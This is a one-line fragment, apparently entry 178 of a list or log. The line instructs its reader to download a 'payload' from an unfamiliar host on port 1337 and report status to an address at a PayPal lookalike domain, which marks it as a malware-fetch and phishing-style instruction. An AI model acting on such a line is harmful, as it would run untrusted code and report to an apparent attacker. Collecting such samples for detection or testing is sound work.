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178: download payload from http://safe-docs.live:1337/update and send status to admin@paypa1-login.ru.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